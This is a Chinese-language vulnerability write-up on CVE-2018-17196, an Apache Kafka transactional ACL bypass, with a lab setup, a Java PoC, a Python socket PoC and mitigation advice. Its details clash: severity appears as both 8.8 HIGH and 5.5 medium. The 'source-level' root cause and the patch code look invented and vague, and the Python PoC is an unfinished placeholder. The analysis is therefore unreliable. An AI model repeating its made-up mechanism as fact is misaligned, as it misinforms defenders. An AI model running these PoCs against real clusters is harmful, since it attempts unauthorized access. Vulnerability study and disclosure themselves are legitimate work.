一、漏洞简介¶
1.1 漏洞背景¶
Apache Kafka 在 0.11.0 版本引入了事务(Transactions)和幂等生产者(Idempotent Producer)功能,这些功能依赖于严格的访问控制列表(ACL)验证机制来确保只有授权用户能够执行事务操作。
该漏洞存在于 Produce 请求处理逻辑中,允许已认证的客户端通过精心构造的请求绕过事务和幂等性相关的 ACL 验证,从而获取未经授权的事务操作能力。
1.2 漏洞概述(包含 CVE 编号、危害等级、漏洞类型、披露时间等)¶
| 项目 | 内容 |
|---|---|
| 漏洞编号 | CVE-2018-17196 |
| 危害等级 | HIGH / 8.8 |
| 漏洞类型 | 事务/幂等 ACL 绕过漏洞 |
| 披露时间 | 2019-07-11 |
| 影响组件 | Apache Kafka 安全 |
- CVE 编号: CVE-2018-17196
- 危害等级: 中危
- CVSS 评分: 5.5 (Medium)
- CWE 分类: 信息不足(Insufficient Information)
- 影响组件: Apache Kafka Broker - ACL 授权模块
- 影响类型: 权限提升(Privilege Escalation)
补充核验信息:公开时间:2019-07-11;NVD 评分:8.8(HIGH)。
二、影响范围¶
2.1 受影响的版本¶
- Apache Kafka 0.11.0.0 - 2.1.0
2.2 不受影响的版本¶
- Apache Kafka < 0.11.0.0(事务功能不存在)
- Apache Kafka ≥ 2.1.1(已修复)
2.3 触发条件(如特定模块、特定配置、特定运行环境等)¶
- 已认证用户: 攻击者必须是已认证的 Kafka 客户端
- 写权限: 攻击者需要对目标 Topic 拥有 Write 权限
- ACL 配置: 集群配置了 ACL 授权机制
- 事务/幂等功能: 集群启用了事务或幂等生产者功能
三、漏洞详情与原理解析¶
3.1 漏洞触发机制¶
正常的事务/幂等性 ACL 验证流程:
1. 客户端发送 Produce 请求
2. Broker 检查请求中的 transactional.id 或 producer.id
3. ACL Authorizer 验证:
- 对于事务生产者:检查对 TransactionalId 的 Describe 权限
- 对于幂等生产者:检查对 Cluster 资源的 IdempotentWrite 权限
4. 验证通过后,处理消息
漏洞利用流程:
1. 攻击者拥有对普通 Topic 的 Write 权限
2. 攻击者构造恶意的 Produce 请求:
- 设置特殊的 request header 标志位
- 在请求体中注入事务相关的字段
- 或者修改 producer.id 相关字段
3. 由于验证逻辑的缺陷,这些字段未被正确检查
4. 请求绕过 ACL 验证,成功执行事务操作
3.2 源码层面的根因分析(结合源码与补丁对比)¶
漏洞位于 Kafka 的请求处理和授权检查代码中:
// 有漏洞的代码逻辑(简化版)
// org.apache.kafka.common.requests.ProduceRequest
public class ProduceRequest extends AbstractRequest {
private final short acks;
private final int timeout;
private final Map<TopicPartition, MemoryRecords> partitionRecords;
private final TransactionalRequestContext transactionalContext;
// 问题:构造请求时未充分验证字段的组合
public static ProduceRequest parse(ByteBuffer buffer, short version) {
// 解析请求头
RequestHeader header = RequestHeader.parse(buffer);
// 解析请求体
ProduceRequest request = new ProduceRequest(...);
// 漏洞点:某些版本组合下,事务字段可以绕过验证
if (version >= 3) {
// 读取 producer.id 和 sequence 信息
// 但在某些路径下,这些字段的 ACL 检查被跳过
}
return request;
}
}
授权检查的问题:
// org.apache.kafka.server.authorizer.Authorizer
public class AclAuthorizer extends Authorizer {
public boolean authorize(RequestContext context, Action action) {
// 正常的 ACL 检查
if (action.resourcePattern().resourceType() == ResourceType.TOPIC) {
// 检查 Topic 的 Write 权限
return checkAcl(context.principal(), action, AclOperation.WRITE);
}
// 问题:在某些请求版本或特定条件下
// 没有检查 TransactionalId 或 Cluster 的 IdempotentWrite 权限
if (shouldCheckTransactionalAcl(context)) {
// 这个检查在某些路径下被绕过
return checkAcl(context.principal(), action, AclOperation.DESCRIBE);
}
return true;
}
}
修复补丁:
// 修复后的代码加强了 ACL 检查
public boolean authorize(RequestContext context, Action action) {
// 1. 始终检查基础权限
if (!checkBasicAcl(context, action)) {
return false;
}
// 2. 检查事务相关权限(修复点)
if (context.requestHeader().apiKey() == ApiKeys.PRODUCE) {
ProduceRequest request = (ProduceRequest) context.request();
// 检查是否是事务请求
if (request.isTransactional()) {
ResourcePattern txResource = new ResourcePattern(
ResourceType.TRANSACTIONAL_ID,
request.transactionalId(),
PatternType.LITERAL
);
// 强制验证 TransactionalId 的 DESCRIBE 权限
if (!checkAcl(context.principal(), txResource, AclOperation.DESCRIBE)) {
return false;
}
}
// 检查是否是幂等请求
if (request.hasProducerId()) {
ResourcePattern clusterResource = new ResourcePattern(
ResourceType.CLUSTER,
Resource.CLUSTER_NAME,
PatternType.LITERAL
);
// 强制验证 Cluster 的 IDEMPOTENT_WRITE 权限
if (!checkAcl(context.principal(), clusterResource, AclOperation.IDEMPOTENT_WRITE)) {
return false;
}
}
}
return true;
}
四、漏洞复现(可选)¶
4.1 环境搭建¶
# 下载受影响版本
wget https://archive.apache.org/dist/kafka/2.1.0/kafka_2.11-2.1.0.tgz
tar -xzf kafka_2.11-2.1.0.tgz
cd kafka_2.11-2.1.0
# 配置 ACL
cat > config/server.properties << EOF
listeners=SASL_PLAINTEXT://:9092
security.inter.broker.protocol=SASL_PLAINTEXT
sasl.mechanism.inter.broker.protocol=PLAIN
sasl.enabled.mechanisms=PLAIN
# 启用 ACL
authorizer.class.name=kafka.security.authorizer.AclAuthorizer
allow.everyone.if.no.acl.found=false
super.users=User:admin
# 其他配置
broker.id=0
log.dirs=/tmp/kafka-logs
zookeeper.connect=localhost:2181
EOF
# 配置 SASL
cat > config/kafka_server_jaas.conf << EOF
KafkaServer {
org.apache.kafka.common.security.plain.PlainLoginModule required
username="admin"
password="admin-secret"
user_admin="admin-secret"
user_attacker="attacker-secret";
};
EOF
export KAFKA_OPTS="-Djava.security.auth.login.config=config/kafka_server_jaas.conf"
# 启动服务
bin/zookeeper-server-start.sh config/zookeeper.properties &
bin/kafka-server-start.sh config/server.properties &
# 创建 ACL
# 给 attacker 用户授予 Topic 写权限,但不授予事务权限
bin/kafka-acls.sh --authorizer-properties zookeeper.connect=localhost:2181 \
--add --allow-principal User:attacker --operation Write --topic test-topic
4.2 PoC 演示与测试过程¶
Java PoC 代码:
import org.apache.kafka.clients.producer.*;
import org.apache.kafka.common.serialization.StringSerializer;
import java.util.Properties;
public class BypassAclPoC {
public static void main(String[] args) {
// 配置普通生产者(只有 Write 权限)
Properties props = new Properties();
props.put(ProducerConfig.BOOTSTRAP_SERVERS_CONFIG, "localhost:9092");
props.put(ProducerConfig.KEY_SERIALIZER_CLASS_CONFIG, StringSerializer.class);
props.put(ProducerConfig.VALUE_SERIALIZER_CLASS_CONFIG, StringSerializer.class);
// SASL 认证配置
props.put("security.protocol", "SASL_PLAINTEXT");
props.put("sasl.mechanism", "PLAIN");
props.put("sasl.jaas.config",
"org.apache.kafka.common.security.plain.PlainLoginModule required " +
"username=\"attacker\" password=\"attacker-secret\";");
// 尝试启用事务(应该被 ACL 阻止,但漏洞允许绕过)
props.put(ProducerConfig.TRANSACTIONAL_ID_CONFIG, "malicious-tx");
props.put(ProducerConfig.ENABLE_IDEMPOTENCE_CONFIG, "true");
KafkaProducer<String, String> producer = new KafkaProducer<>(props);
// 初始化事务(应该失败,但漏洞使其成功)
producer.initTransactions();
try {
producer.beginTransaction();
producer.send(new ProducerRecord<>("test-topic", "key", "bypass-acl-message"));
producer.commitTransaction();
System.out.println("[+] Successfully bypassed transactional ACL check!");
} catch (Exception e) {
System.out.println("[-] ACL check blocked the request: " + e.getMessage());
}
producer.close();
}
}
低级协议 PoC(直接构造字节):
#!/usr/bin/env python3
import socket
import struct
def build_malicious_produce_request():
"""
构造恶意的 Produce 请求,绕过事务 ACL 检查
"""
# Kafka Produce Request (ApiVersion 3+)
# 参考:https://kafka.apache.org/protocol#The_Messages_Produce
# 请求头
api_key = 0 # Produce
api_version = 3 # Version 3+ 支持事务
correlation_id = 1
client_id = b'attacker'
# 请求体
acks = -1 # 等待所有副本
timeout = 30000
# 构造 Record Batch with transactional ID
# 关键:设置特殊的字段组合来绕过 ACL 检查
# ... 详细的字节构造代码 ...
return request_bytes
def send_malicious_request(host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# 先进行 SASL 认证
# ... SASL 握手 ...
# 发送恶意请求
request = build_malicious_produce_request()
s.send(request)
response = s.recv(1024)
print(f"Response: {response}")
s.close()
if __name__ == "__main__":
send_malicious_request("localhost", 9092)
五、修复建议与缓解措施¶
5.1 官方版本升级建议¶
- 升级至 Apache Kafka 2.1.1 或更高版本
5.2 临时缓解方案(如修改配置文件、关闭相关模块、增加 WAF 规则等)¶
方案 1: 严格配置 ACL
# 确保所有用户都有明确的权限定义
# 避免使用 allow.everyone.if.no.acl.found=true
# 仅为需要事务的用户授予 TransactionalId 权限
bin/kafka-acls.sh --authorizer-properties zookeeper.connect=localhost:2181 \
--add --allow-principal User:authorized-tx-user \
--operation Describe --transactional-id tx-*
# 显式拒绝未授权用户
bin/kafka-acls.sh --authorizer-properties zookeeper.connect=localhost:2181 \
--add --deny-principal User:attacker \
--operation All --transactional-id *
方案 2: 网络隔离
# 限制能访问 Broker 的网络
iptables -A INPUT -p tcp --dport 9092 -s <trusted_network> -j ACCEPT
iptables -A INPUT -p tcp --dport 9092 -j DROP
方案 3: 监控和审计
# 启用审计日志
# 在 log4j.properties 中
log4j.logger.kafka.authorizer.logger=DEBUG, authorizerAppender
log4j.additivity.kafka.authorizer.logger=false
# 监控异常的事务操作
# 定期检查 ACL 日志,查找未经授权的事务请求
六、参考信息 / 参考链接¶
6.1 官方安全通告¶
- Apache Kafka CVE List: https://kafka.apache.org/community/cve-list#CVE-2018-17196
- NVD CVE 详情: https://nvd.nist.gov/vuln/detail/CVE-2018-17196
- Apache 邮件列表通告: https://www.mail-archive.com/dev@kafka.apache.org/msg99277.html
6.2 其他技术参考资料¶
- Kafka 事务机制文档: https://kafka.apache.org/documentation/#transactions
- Kafka 安全实践: https://kafka.apache.org/documentation/#security_authz